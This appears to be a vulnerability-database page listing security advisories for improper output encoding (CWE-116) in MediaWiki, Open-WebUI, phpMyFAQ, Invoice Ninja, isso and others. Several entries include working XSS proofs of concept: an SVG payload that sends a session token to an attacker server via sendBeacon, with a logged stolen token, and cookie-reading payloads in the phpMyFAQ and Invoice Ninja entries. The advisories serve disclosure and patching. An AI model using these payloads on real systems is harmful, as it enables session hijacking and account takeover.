CWE-116
Allowed-with-ReviewImproper Encoding or Escaping of Output
Abstraction: Class · Status: Draft
The product prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved.
614 vulnerabilities reference this CWE, most recent first.
GHSA-8W2V-M598-22Q3
Vulnerability from github – Published: 2024-10-09 06:30 – Updated: 2024-10-10 00:31An issue was discovered in the Vector Skin component for MediaWiki before 1.39.5 and 1.40.x before 1.40.1. vector-toc-toggle-button-label is not escaped, but should be, because the line param can have markup.
{
"affected": [],
"aliases": [
"CVE-2023-45359"
],
"database_specific": {
"cwe_ids": [
"CWE-116"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-09T06:15:13Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in the Vector Skin component for MediaWiki before 1.39.5 and 1.40.x before 1.40.1. vector-toc-toggle-button-label is not escaped, but should be, because the line param can have markup.",
"id": "GHSA-8w2v-m598-22q3",
"modified": "2024-10-10T00:31:06Z",
"published": "2024-10-09T06:30:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45359"
},
{
"type": "WEB",
"url": "https://gerrit.wikimedia.org/r/plugins/gitiles/mediawiki/skins/Vector/+/c17b956e0750e051ac7c1098e3ff625f0db82b2c"
},
{
"type": "WEB",
"url": "https://phabricator.wikimedia.org/T340217"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-8WVC-869R-XFQF
Vulnerability from github – Published: 2025-12-04 22:03 – Updated: 2025-12-04 22:03Summary
A Stored XSS vulnerability has been discovered in Open-WebUI's Notes PDF download functionality. An attacker can import a Markdown file containing malicious SVG tags into Notes, allowing them to execute arbitrary JavaScript code and steal session tokens when a victim downloads the note as PDF.
This vulnerability can be exploited by any authenticated user, and unauthenticated external attackers can steal session tokens from users (both admin and regular users) by sharing specially crafted markdown files.
Details
Vulnerability Location
File: src/lib/components/notes/utils.ts
Function: downloadPdf()
Vulnerable Code (Line 35):
const contentNode = document.createElement('div');
contentNode.innerHTML = html; // Direct assignment without DOMPurify sanitization
node.appendChild(contentNode);
document.body.appendChild(node);
Root Cause
- Incomplete TipTap Editor Configuration
- Open-WebUI only uses TipTap StarterKit
- No Schema definition for dangerous tags like SVG, Script
-
Unknown HTML tags are stored as raw HTML
-
Missing Sanitization During PDF Generation
note.data.content.htmlis directly assigned toinnerHTML- No DOMPurify or other sanitization
- Stored malicious HTML executes as-is
PoC
Environment
- Open-WebUI latest version (v0.6.36)
- Admin account
Step 1: Create Malicious Markdown File
Filename: token_stealer.md
<svg onload="navigator.sendBeacon('https://redacted/steal',localStorage.token)"></svg>
navigator.sendBeacon() was used to bypass CORS.
Step 2: Import to Notes
- Login to Open-WebUI
- Click "Notes" in the left menu
- Drag and drop the Markdown file
- Note is automatically created
Step 3: Trigger PDF Download
- Access Notes menu (/notes)
- Click ⋯ on the right side of the uploaded note
- Select "Download" → "PDF document (.pdf)"
- JavaScript executes
Step 4: Verify Token Theft
Attacker's server log:
POST /steal HTTP/1.1
Host: redacted
Content-Type: text/plain;charset=UTF-8
Content-Length: 145
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjVkMjE4ZmU4LTU2MTktNGEzNS05MWZkLTM2MzA3NDU1NGFkNCJ9.zOicE5c5FJ3ZOc9j6T2xHU-K6dbz-s1ib_hIG4LayFw
And Simple PoC alert(1)
Filename: simple_poc.md
<svg onload="alert(1)"></svg>
Impact
CVSS 3.1 Score: 8.7 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
Vulnerability Type
CWE-79: Cross-site Scripting (XSS)
CWE-116: Improper Encoding or Escaping of Output
Affected Users
- All Open-WebUI users
- Especially users utilizing the Notes feature
Attack Scenario
1. Attacker shares malicious note (.md file) in the community
2. Victim uploads the shared note (.md file)
3. Victim downloads as PDF
4. XSS vulnerability triggers
5. Victim's session (localStorage.token) is stolen
Recommended Patch
// src/lib/components/notes/utils.ts:35
import DOMPurify from 'dompurify';
const contentNode = document.createElement('div');
// Sanitize with DOMPurify
contentNode.innerHTML = DOMPurify.sanitize(html, {
ALLOWED_TAGS: [
'p', 'br', 'strong', 'em', 'u', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6',
'ul', 'ol', 'li', 'a', 'code', 'pre', 'blockquote', 'table', 'thead',
'tbody', 'tr', 'td', 'th'
],
ALLOWED_ATTR: ['href', 'class', 'target'],
FORBID_TAGS: ['svg', 'script', 'iframe', 'object', 'embed', 'style'],
FORBID_ATTR: ['onload', 'onerror', 'onclick', 'onmouseover', 'onfocus'],
ALLOW_DATA_ATTR: false
});
node.appendChild(contentNode);
References
- OWASP XSS Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
- DOMPurify: https://github.com/cure53/DOMPurify
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.6.36"
},
"package": {
"ecosystem": "npm",
"name": "open-webui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.6.37"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-65959"
],
"database_specific": {
"cwe_ids": [
"CWE-116",
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-04T22:03:24Z",
"nvd_published_at": "2025-12-04T21:16:08Z",
"severity": "HIGH"
},
"details": "## Summary\n\nA **Stored XSS vulnerability** has been discovered in Open-WebUI\u0027s Notes PDF download functionality. \nAn attacker can import a Markdown file containing malicious SVG tags into Notes, allowing them to **execute arbitrary JavaScript code** and **steal session tokens** when a victim downloads the note as PDF. \n\nThis vulnerability can be exploited by **any authenticated user**, and unauthenticated external attackers can steal session tokens from users (both admin and regular users) by sharing specially crafted markdown files.\n\n## Details\n\n### Vulnerability Location\n\n**File:** `src/lib/components/notes/utils.ts` \n**Function:** `downloadPdf()` \n**Vulnerable Code (Line 35):**\n\n```typescript\nconst contentNode = document.createElement(\u0027div\u0027);\n\ncontentNode.innerHTML = html; // Direct assignment without DOMPurify sanitization\n\nnode.appendChild(contentNode);\ndocument.body.appendChild(node);\n```\n\n### Root Cause\n\n1. **Incomplete TipTap Editor Configuration**\n - Open-WebUI only uses TipTap StarterKit\n - No Schema definition for dangerous tags like SVG, Script\n - Unknown HTML tags are stored as raw HTML\n \n2. **Missing Sanitization During PDF Generation**\n - `note.data.content.html` is directly assigned to `innerHTML`\n - No DOMPurify or other sanitization\n - Stored malicious HTML executes as-is\n\n\n## PoC\n\n### Environment\n- Open-WebUI latest version (v0.6.36)\n- Admin account\n\n### Step 1: Create Malicious Markdown File\n\n**Filename:** `token_stealer.md`\n\n```markdown\n\u003csvg onload=\"navigator.sendBeacon(\u0027https://redacted/steal\u0027,localStorage.token)\"\u003e\u003c/svg\u003e\n```\n\u003e navigator.sendBeacon() was used to bypass CORS.\n\n### Step 2: Import to Notes\n\n1. Login to Open-WebUI\n2. Click **\"Notes\"** in the left menu\n3. **Drag and drop** the Markdown file\n4. Note is automatically created\n\n### Step 3: Trigger PDF Download\n\n1. Access Notes menu (/notes)\n2. Click **\u22ef** on the right side of the uploaded note\n3. Select **\"Download\"** \u2192 **\"PDF document (.pdf)\"**\n4. JavaScript executes\n\n### Step 4: Verify Token Theft\n\n**Attacker\u0027s server log:**\n```http\nPOST /steal HTTP/1.1\nHost: redacted\nContent-Type: text/plain;charset=UTF-8\nContent-Length: 145\n\neyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjVkMjE4ZmU4LTU2MTktNGEzNS05MWZkLTM2MzA3NDU1NGFkNCJ9.zOicE5c5FJ3ZOc9j6T2xHU-K6dbz-s1ib_hIG4LayFw\n```\n\n### And Simple PoC `alert(1)`\n**Filename:** `simple_poc.md`\n\n```markdown\n\u003csvg onload=\"alert(1)\"\u003e\u003c/svg\u003e\n```\n\u003cimg width=\"1089\" height=\"310\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ded7bb4a-d0e0-4614-8d64-3113c1f79e2f\" /\u003e\n\n\n---\n\n## Impact\n\n**CVSS 3.1 Score: 8.7 (High)**\n\n```\nCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N\n```\n\n### Vulnerability Type\n**CWE-79: Cross-site Scripting (XSS)** \n**CWE-116: Improper Encoding or Escaping of Output**\n\n### Affected Users\n- **All Open-WebUI users**\n- Especially users utilizing the Notes feature\n\n### Attack Scenario\n```\n1. Attacker shares malicious note (.md file) in the community\n2. Victim uploads the shared note (.md file)\n3. Victim downloads as PDF\n4. XSS vulnerability triggers\n5. Victim\u0027s session (localStorage.token) is stolen\n```\n\n---\n\n## Recommended Patch\n\n```typescript\n// src/lib/components/notes/utils.ts:35\nimport DOMPurify from \u0027dompurify\u0027;\n\nconst contentNode = document.createElement(\u0027div\u0027);\n\n// Sanitize with DOMPurify\ncontentNode.innerHTML = DOMPurify.sanitize(html, {\n ALLOWED_TAGS: [\n \u0027p\u0027, \u0027br\u0027, \u0027strong\u0027, \u0027em\u0027, \u0027u\u0027, \u0027h1\u0027, \u0027h2\u0027, \u0027h3\u0027, \u0027h4\u0027, \u0027h5\u0027, \u0027h6\u0027,\n \u0027ul\u0027, \u0027ol\u0027, \u0027li\u0027, \u0027a\u0027, \u0027code\u0027, \u0027pre\u0027, \u0027blockquote\u0027, \u0027table\u0027, \u0027thead\u0027,\n \u0027tbody\u0027, \u0027tr\u0027, \u0027td\u0027, \u0027th\u0027\n ],\n ALLOWED_ATTR: [\u0027href\u0027, \u0027class\u0027, \u0027target\u0027],\n FORBID_TAGS: [\u0027svg\u0027, \u0027script\u0027, \u0027iframe\u0027, \u0027object\u0027, \u0027embed\u0027, \u0027style\u0027],\n FORBID_ATTR: [\u0027onload\u0027, \u0027onerror\u0027, \u0027onclick\u0027, \u0027onmouseover\u0027, \u0027onfocus\u0027],\n ALLOW_DATA_ATTR: false\n});\n\nnode.appendChild(contentNode);\n```\n\n---\n\n## References\n\n- OWASP XSS Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html\n- DOMPurify: https://github.com/cure53/DOMPurify\n\n---",
"id": "GHSA-8wvc-869r-xfqf",
"modified": "2025-12-04T22:03:24Z",
"published": "2025-12-04T22:03:24Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-8wvc-869r-xfqf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65959"
},
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/commit/03cc6ce8eb5c055115406e2304fbf7e3338b8dce"
},
{
"type": "PACKAGE",
"url": "https://github.com/open-webui/open-webui"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Open WebUI Vulnerable to Stored DOM XSS via Note \u0027Download PDF\u0027"
}
GHSA-92HF-4CHR-8HRF
Vulnerability from github – Published: 2022-05-24 17:32 – Updated: 2022-05-24 17:32A flaw was found in Ansible Collection community.crypto. openssl_privatekey_info exposes private key in logs. This directly impacts confidentiality
{
"affected": [],
"aliases": [
"CVE-2020-25646"
],
"database_specific": {
"cwe_ids": [
"CWE-116"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-10-29T20:15:00Z",
"severity": "HIGH"
},
"details": "A flaw was found in Ansible Collection community.crypto. openssl_privatekey_info exposes private key in logs. This directly impacts confidentiality",
"id": "GHSA-92hf-4chr-8hrf",
"modified": "2022-05-24T17:32:32Z",
"published": "2022-05-24T17:32:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-25646"
},
{
"type": "WEB",
"url": "https://github.com/ansible-collections/community.crypto/commit/233d1afc296f6770e905a1785ee2f35af7605e43"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-9525-27VJ-C8R8
Vulnerability from github – Published: 2026-05-06 20:10 – Updated: 2026-06-08 23:58Summary
A stored XSS vulnerability in the comment rendering pipeline allows an authenticated user to inject JavaScript that executes for every visitor of an affected FAQ or News page. An attacker with a registered account can steal admin session cookies and take over the application.
Details
Utils::parseUrl() (phpmyfaq/src/phpMyFAQ/Utils.php, line 281) converts URLs in comment text into clickable <a> tags at render time:
$pattern = '/(https?:\/\/[^\s]+)/i';
$replacement = '<a href="$1">$1</a>';
return preg_replace($pattern, $replacement, $string);
The regex [^\s]+ matches " and <, and the URL is inserted into the href attribute with no htmlspecialchars() call. A URL with a literal " closes the attribute early and allows injecting event handlers like onmouseover.
This only reaches the sink when main.enableCommentEditor is enabled. In that path, comment text goes through sanitizeHtmlComment() instead of FILTER_SANITIZE_SPECIAL_CHARS — which encodes " — so the double-quote survives to storage. The comment is then passed through parseUrl() and rendered via {{ comment.comment|raw }} in comment.macros.twig (line 40), which disables Twig auto-escaping.
The same sink exists in the admin comment panel (admin/content/comments.twig, lines 62 and 112), so admins viewing the panel are also affected.
No Content-Security-Policy headers are set anywhere in the app.
PoC
Requirements: - main.enableCommentEditor = true (set in admin Configuration panel) - attacker has any registered user account - one FAQ entry with comments allowed exists
Steps: 1. Log in as a registered user and open a FAQ with comments. 2. Submit the following as the comment text:
https://www.evil.com/"onmouseover="alert(document.cookie)
(www. prefix required — parseUrl strips https:// then only re-adds it for www. URLs, which is what triggers the linkification)
- Any user who views that FAQ page and hovers the link triggers the payload. To hit an admin, wait for them to visit the page or check the admin comments panel at /admin/content/comments.
Resulting HTML in the page:
<a href="https://www.evil.com/"onmouseover="alert(document.cookie)">
...
</a>
The " closes the href attribute; onmouseover becomes a real attribute.
Impact
Stored XSS affecting all visitors of the page, including admins. Session cookie theft leads to full admin account takeover. The payload looks like a normal URL and persists until manually deleted.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "thorsten/phpmyfaq"
},
"ranges": [
{
"events": [
{
"introduced": "4.1.1"
},
{
"fixed": "4.1.2"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"4.1.1"
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "phpmyfaq/phpmyfaq"
},
"ranges": [
{
"events": [
{
"introduced": "4.1.1"
},
{
"fixed": "4.1.2"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"4.1.1"
]
}
],
"aliases": [
"CVE-2026-46367"
],
"database_specific": {
"cwe_ids": [
"CWE-116",
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-06T20:10:48Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nA stored XSS vulnerability in the comment rendering pipeline allows an authenticated user to inject JavaScript that executes for every visitor of an affected FAQ or News page. An attacker with a registered account can steal admin session cookies and take over the application.\n\n### Details\n\n`Utils::parseUrl()` (`phpmyfaq/src/phpMyFAQ/Utils.php`, line 281) converts URLs in comment text into clickable `\u003ca\u003e` tags at render time:\n\n $pattern = \u0027/(https?:\\/\\/[^\\s]+)/i\u0027;\n $replacement = \u0027\u003ca href=\"$1\"\u003e$1\u003c/a\u003e\u0027;\n return preg_replace($pattern, $replacement, $string);\n\nThe regex `[^\\s]+` matches `\"` and `\u003c`, and the URL is inserted into the href attribute with no htmlspecialchars() call. A URL with a literal `\"` closes the attribute early and allows injecting event handlers like onmouseover.\n\nThis only reaches the sink when `main.enableCommentEditor` is enabled. In that path, comment text goes through `sanitizeHtmlComment()` instead of `FILTER_SANITIZE_SPECIAL_CHARS` \u2014 which encodes `\"` \u2014 so the double-quote survives to storage. The comment is then passed through parseUrl() and rendered via `{{ comment.comment|raw }}` in `comment.macros.twig` (line 40), which disables Twig auto-escaping.\n\nThe same sink exists in the admin comment panel (`admin/content/comments.twig`, lines 62 and 112), so admins viewing the panel are also affected.\n\nNo Content-Security-Policy headers are set anywhere in the app.\n\n### PoC\n\nRequirements:\n- main.enableCommentEditor = true (set in admin Configuration panel)\n- attacker has any registered user account\n- one FAQ entry with comments allowed exists\n\nSteps:\n1. Log in as a registered user and open a FAQ with comments.\n2. Submit the following as the comment text:\n\n https://www.evil.com/\"onmouseover=\"alert(document.cookie)\n\n (www. prefix required \u2014 parseUrl strips https:// then only re-adds\n it for www. URLs, which is what triggers the linkification)\n\n3. Any user who views that FAQ page and hovers the link triggers the\n payload. To hit an admin, wait for them to visit the page or check\n the admin comments panel at /admin/content/comments.\n\nResulting HTML in the page:\n\n \u003ca href=\"https://www.evil.com/\"onmouseover=\"alert(document.cookie)\"\u003e\n ...\n \u003c/a\u003e\n\nThe `\"` closes the href attribute; onmouseover becomes a real attribute.\n\n### Impact\n\nStored XSS affecting all visitors of the page, including admins. Session cookie theft leads to full admin account takeover. The payload looks like a normal URL and persists until manually deleted.",
"id": "GHSA-9525-27vj-c8r8",
"modified": "2026-06-08T23:58:14Z",
"published": "2026-05-06T20:10:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9525-27vj-c8r8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46367"
},
{
"type": "PACKAGE",
"url": "https://github.com/thorsten/phpMyFAQ"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/phpmyfaq-stored-xss-via-utils-parseurl-in-comment-rendering"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "phpMyFAQ has stored XSS via Utils::parseUrl() in comment rendering"
}
GHSA-95W5-Q9VP-5VRM
Vulnerability from github – Published: 2022-10-24 19:00 – Updated: 2022-10-25 20:22Heron versions <= 0.20.4-incubating allows CRLF log injection because of the lack of escaping in the log statements. Please update to version 0.20.5-incubating which addresses this issue.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.heron:heron-api"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.20.5-incubating"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-42010"
],
"database_specific": {
"cwe_ids": [
"CWE-116"
],
"github_reviewed": true,
"github_reviewed_at": "2022-10-25T20:22:49Z",
"nvd_published_at": "2022-10-24T14:15:00Z",
"severity": "CRITICAL"
},
"details": "Heron versions \u003c= 0.20.4-incubating allows CRLF log injection because of the lack of escaping in the log statements. Please update to version 0.20.5-incubating which addresses this issue.",
"id": "GHSA-95w5-q9vp-5vrm",
"modified": "2022-10-25T20:22:49Z",
"published": "2022-10-24T19:00:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-42010"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/j65nwr8n7jchngwqptzh100drcr4ry2q"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2022/10/23/2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Heron allows CRLF log injection"
}
GHSA-98WM-CXPW-847P
Vulnerability from github – Published: 2026-03-24 20:40 – Updated: 2026-03-27 21:34Vulnerability Details
Invoice line item descriptions in Invoice Ninja v5.13.0 bypass the XSS denylist filter, allowing stored XSS payloads to execute when invoices are rendered in the PDF preview or client portal.
The line item description field was not passed through purify::clean() before rendering.
Steps to Reproduce
- Login as any authenticated user
- Create or edit an invoice
- In a line item description, enter:
<img src=x onerror=alert(document.cookie)> - Save the invoice and preview it
- The XSS payload executes in the browser
Impact
- Attacker: Any authenticated user who can create invoices
- Victim: Any user viewing the invoice (including clients via the portal)
- Specific damage: Session hijacking, account takeover, data exfiltration
Proposed Fix
Fixed in v5.13.4 by the vendor by adding purify::clean() to sanitize line item descriptions.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "invoiceninja/invoiceninja"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.13.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33628"
],
"database_specific": {
"cwe_ids": [
"CWE-116",
"CWE-184",
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-24T20:40:16Z",
"nvd_published_at": "2026-03-26T21:17:07Z",
"severity": "MODERATE"
},
"details": "## Vulnerability Details\n\nInvoice line item descriptions in Invoice Ninja v5.13.0 bypass the XSS denylist filter, allowing stored XSS payloads to execute when invoices are rendered in the PDF preview or client portal.\n\nThe line item description field was not passed through `purify::clean()` before rendering.\n\n## Steps to Reproduce\n\n1. Login as any authenticated user\n2. Create or edit an invoice\n3. In a line item description, enter: `\u003cimg src=x onerror=alert(document.cookie)\u003e`\n4. Save the invoice and preview it\n5. The XSS payload executes in the browser\n\n## Impact\n\n- **Attacker**: Any authenticated user who can create invoices\n- **Victim**: Any user viewing the invoice (including clients via the portal)\n- **Specific damage**: Session hijacking, account takeover, data exfiltration\n\n## Proposed Fix\n\nFixed in v5.13.4 by the vendor by adding `purify::clean()` to sanitize line item descriptions.",
"id": "GHSA-98wm-cxpw-847p",
"modified": "2026-03-27T21:34:58Z",
"published": "2026-03-24T20:40:16Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/invoiceninja/invoiceninja/security/advisories/GHSA-98wm-cxpw-847p"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33628"
},
{
"type": "WEB",
"url": "https://github.com/invoiceninja/invoiceninja/commit/b81a3fc302573fc4a53d61e8537dd19154ce1091"
},
{
"type": "PACKAGE",
"url": "https://github.com/invoiceninja/invoiceninja"
},
{
"type": "WEB",
"url": "https://github.com/invoiceninja/invoiceninja/releases/tag/v5.13.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Invoice Ninja Denylist Bypass may Lead to Stored XSS via Invoice Line Items"
}
GHSA-9F5V-36FP-5CV6
Vulnerability from github – Published: 2022-05-14 03:11 – Updated: 2022-05-14 03:11The PGObject::Util::DBAdmin module before 0.120.0 for Perl, as used in LedgerSMB through 1.5.x, insufficiently sanitizes or escapes variable values used as part of shell command execution, resulting in shell code injection via the create(), run_file(), backup(), or restore() function. The vulnerability allows unauthorized users to execute code with the same privileges as the running application.
{
"affected": [],
"aliases": [
"CVE-2018-9246"
],
"database_specific": {
"cwe_ids": [
"CWE-116"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-06-08T01:29:00Z",
"severity": "CRITICAL"
},
"details": "The PGObject::Util::DBAdmin module before 0.120.0 for Perl, as used in LedgerSMB through 1.5.x, insufficiently sanitizes or escapes variable values used as part of shell command execution, resulting in shell code injection via the create(), run_file(), backup(), or restore() function. The vulnerability allows unauthorized users to execute code with the same privileges as the running application.",
"id": "GHSA-9f5v-36fp-5cv6",
"modified": "2022-05-14T03:11:18Z",
"published": "2022-05-14T03:11:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-9246"
},
{
"type": "WEB",
"url": "https://archive.ledgersmb.org/ledger-smb-announce/msg00280.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9FHH-GQV6-6CP4
Vulnerability from github – Published: 2022-05-02 03:53 – Updated: 2022-05-02 03:53The console in Apache jUDDI 3.0.0 does not properly escape line feeds, which allows remote authenticated users to spoof log entries via the numRows parameter.
{
"affected": [],
"aliases": [
"CVE-2009-4267"
],
"database_specific": {
"cwe_ids": [
"CWE-116"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-02-19T16:29:00Z",
"severity": "MODERATE"
},
"details": "The console in Apache jUDDI 3.0.0 does not properly escape line feeds, which allows remote authenticated users to spoof log entries via the numRows parameter.",
"id": "GHSA-9fhh-gqv6-6cp4",
"modified": "2022-05-02T03:53:12Z",
"published": "2022-05-02T03:53:12Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2009-4267"
},
{
"type": "WEB",
"url": "http://juddi.apache.org/security.html"
},
{
"type": "WEB",
"url": "http://mail-archives.apache.org/mod_mbox/juddi-user/201802.mbox/raw/%3C0F272EE1-E2B4-4016-8C5D-F76ABDD12D18%40gmail.com%3E"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-9FWW-8CPR-Q66R
Vulnerability from github – Published: 2026-02-24 16:03 – Updated: 2026-02-24 16:03Impact
This is a stored Cross-Site Scripting (XSS) vulnerability affecting the website and author comment fields. The website field was HTML-escaped using quote=False, which left single and double quotes unescaped. Since the frontend inserts the website value directly into a single-quoted href attribute via string concatenation, a single quote in the URL breaks out of the attribute context, allowing injection of arbitrary event handlers (e.g. onmouseover, onclick).
The same escaping was missing entirely from the user-facing comment edit endpoint (PUT /id/) and the moderation edit endpoint (POST /id//edit/).
Any visitor to a page embedding isso comments is impacted. No authentication or interaction beyond mouse movement is required to trigger a payload — an attacker can post a comment anonymously (moderation is off by default) with a crafted website URL, and the payload persists in the database and fires on every page load. With the full-page invisible overlay technique described in the report, the victim only needs to move their mouse.
Patches
The issue is fixed in commit 3cf27c2. Users should upgrade to a version containing that commit once released. The fix applies html.escape(..., quote=True) to the website field across all three write paths (POST /new, PUT /id/, POST /id//edit/), and adds input validation and escaping to the moderation edit endpoint which previously had neither.
Workarounds
Enabling comment moderation (moderation = enabled = true in isso.cfg) prevents unauthenticated users from publishing comments, raising the bar for exploitation. However, it does not fully mitigate the issue since a moderator activating a malicious comment would still expose visitors. There is no configuration-only workaround that fully prevents the vulnerability.
Resources
- https://docs.python.org/3/library/html.html#html.escape — note the quote parameter
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "isso"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.13.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27469"
],
"database_specific": {
"cwe_ids": [
"CWE-116",
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-24T16:03:04Z",
"nvd_published_at": "2026-02-21T08:16:11Z",
"severity": "MODERATE"
},
"details": "## Impact\n\nThis is a stored Cross-Site Scripting (XSS) vulnerability affecting the website and author comment fields. The website field was HTML-escaped using quote=False, which left single and double quotes unescaped. Since the frontend inserts the website value directly into a single-quoted href attribute via string concatenation, a single quote in the URL breaks out of the attribute context, allowing injection of arbitrary event handlers (e.g. onmouseover, onclick).\n\nThe same escaping was missing entirely from the user-facing comment edit endpoint (PUT /id/\u003cid\u003e) and the moderation edit endpoint (POST /id/\u003cid\u003e/edit/\u003ckey\u003e).\n\nAny visitor to a page embedding isso comments is impacted. No authentication or interaction beyond mouse movement is required to trigger a payload \u2014 an attacker can post a comment anonymously (moderation is off by default) with a crafted website URL, and the payload persists in the database and fires on every page load. With the full-page invisible overlay technique described in the report, the victim only needs to move their mouse.\n\n## Patches\n\nThe issue is fixed in commit 3cf27c2. Users should upgrade to a version containing that commit once released. The fix applies html.escape(..., quote=True) to the website field across all three write paths (POST /new, PUT /id/\u003cid\u003e, POST /id/\u003cid\u003e/edit/\u003ckey\u003e), and adds input validation and escaping to the moderation edit endpoint which previously had neither.\n\n## Workarounds\n\n Enabling comment moderation (moderation = enabled = true in isso.cfg) prevents unauthenticated users from publishing comments, raising the bar for exploitation. However, it\n does not fully mitigate the issue since a moderator activating a malicious comment would still expose visitors. There is no configuration-only workaround that fully prevents\n the vulnerability.\n\n## Resources\n\n - https://docs.python.org/3/library/html.html#html.escape \u2014 note the quote parameter",
"id": "GHSA-9fww-8cpr-q66r",
"modified": "2026-02-24T16:03:04Z",
"published": "2026-02-24T16:03:04Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/isso-comments/isso/security/advisories/GHSA-9fww-8cpr-q66r"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27469"
},
{
"type": "WEB",
"url": "https://github.com/isso-comments/isso/commit/0afbfe0691ee237963e8fb0b2ee01c9e55ca2144"
},
{
"type": "WEB",
"url": "https://docs.python.org/3/library/html.html#html.escape"
},
{
"type": "PACKAGE",
"url": "https://github.com/isso-comments/isso"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Isso affected by Stored XSS via comment website field"
}
GHSA-9GQ4-2485-Q63Q
Vulnerability from github – Published: 2026-07-15 15:33 – Updated: 2026-07-15 15:33A flaw was found in CRI-O. The fix for a previous vulnerability (CVE-2022-4318) was incorrect, allowing it to be bypassed. An attacker capable of setting environment variables on a container can inject a newline character into the HOME environment variable. This issue allows the addition of arbitrary lines into /etc/passwd by use of a specially crafted environment variable.
{
"affected": [],
"aliases": [
"CVE-2026-15809"
],
"database_specific": {
"cwe_ids": [
"CWE-116",
"CWE-134"
],
"github_reviewed": false,
